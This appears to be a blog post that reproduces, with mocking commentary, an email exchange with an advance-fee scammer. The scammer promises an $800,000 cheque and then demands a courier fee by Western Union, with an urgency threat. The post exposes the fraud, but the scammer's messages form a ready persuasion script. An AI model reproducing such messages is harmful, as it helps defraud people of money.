WELL, I RECEIVE YOUR EMAIL AND ITS CONTENT AND I HAVE MADE SOME INQUIRES ACCORDING TO THE INSTRUCTIONS GIVEN TO ME BY MY BOSS BEFORE HE WENT TO LONDON AND I WANT YOU TO DO ME A FAVOR NOW TOWARDS YOUR FUNDS IN A CERTIFIED BANK CHEQUE ($800,000.00 USD), DO YOU WANT TO RECEIVE IT THROUGH BANK TO BANK WIRING TRANSFER OR DO YOU WANT IT THROUGH DELIVERY FROM COURIER COMPANY, I WANT YOU TO GET BACK TO ME TODAY CONCERNING THIS MATTER! AND IF YOUR CHOICE IS BANK TO BANK WIRING TRANSFER, PLEASE TRY TO FORWARD ME YOUR BANK ACCOUNT INFORMATION BECAUSE THE BANK HERE NEEDS IT TO TRANSFER YOUR FUND INTO YOUR ACCOUNT THERE OK.


BUT IF YOUR CHOICE IS THROUGH COURIER COMPANY, THEN I ALSO WANT YOU TO GET BACK TO ME AS SOON AS POSSIBLE, SO THAT I WILL MAKE THE REMAINING ARRANGEMENT WITH THE COURIER COMPANY HERE CONCERNING HOW TO DELIVERY YOUR CERTIFIED BANK CHEQUE OF $800, 000.00 USD TO YOU, BECAUSE YOUR ADDRESS IS ALREADY RECEIVED HERE OK.

THANKS AND HAPPY TO HEAR BACK FROM YOU,


YOURS SINCERELY,
JOHN IZUALO,
PHONE: +234-806-4228395.

Me

Hello Mr Jhon,

I would like to go through a courier company because I do not have currently my bank account available. What should I do?

Thanks

Best

Scammer

Dear Davide XXXX,
Well, I received your e-mail and its content but inquires I made today stated that delivering your cheque of USD$800,000.00 to you through courier company will only cost you $195.92 for its delivering through FedEx.

and you are required to send the delivering fee of $195.92 through western union or money gram money transfer in the below receiver's name information ok. As soon as you send the fee then get back to me with the MTCN and your cheque of $800, 000.00 must be delivered to you without wasting any time OK.

HERE IS THE RECEIVER'S NAME INFORMATION TO SEND THE REQUIRED FEE OF $195.92 THROUGH WESTERN UNION MONEY TRANSFER OR MONEY GRAM:


RECEIVER'S NAME: PETER NWAKOR

CITY: LAGOS

COUNTRY: NIGERIA

COUNTRY CODE: +234.

TEST QUESTION: IN GOD?

ANSWER: WE TRUST

Thanks,

Mr. John Izualo.

Phone: +234-806-4228395

Me

Hi Thanks a lot.

Tomorrow I will send the money. When I will receive the money?

Do you need more informations to send the money?

Thanks a lot thanks

Best

Everything was working fine and I was so happy to receive my payment of 800K $.

But I made I mistake. I waited too much to make the payment via WU and my Nigerian friend became angry 🙁

He replied to me the following:

Scammer

Am here to inform you that i have tried my best to make sure you receive your cheque, but i cansee that you are not serious about it, failure to compiler with me by the fee today and tomorrow, i will return the cheque to my boss first thing on Monday morning.

The weekend started and I cannot reach out to him anymore. He doesn’t answer anymore. My Yacht has to wait…. maybe the next scam will be the right one!!

Leave a Comment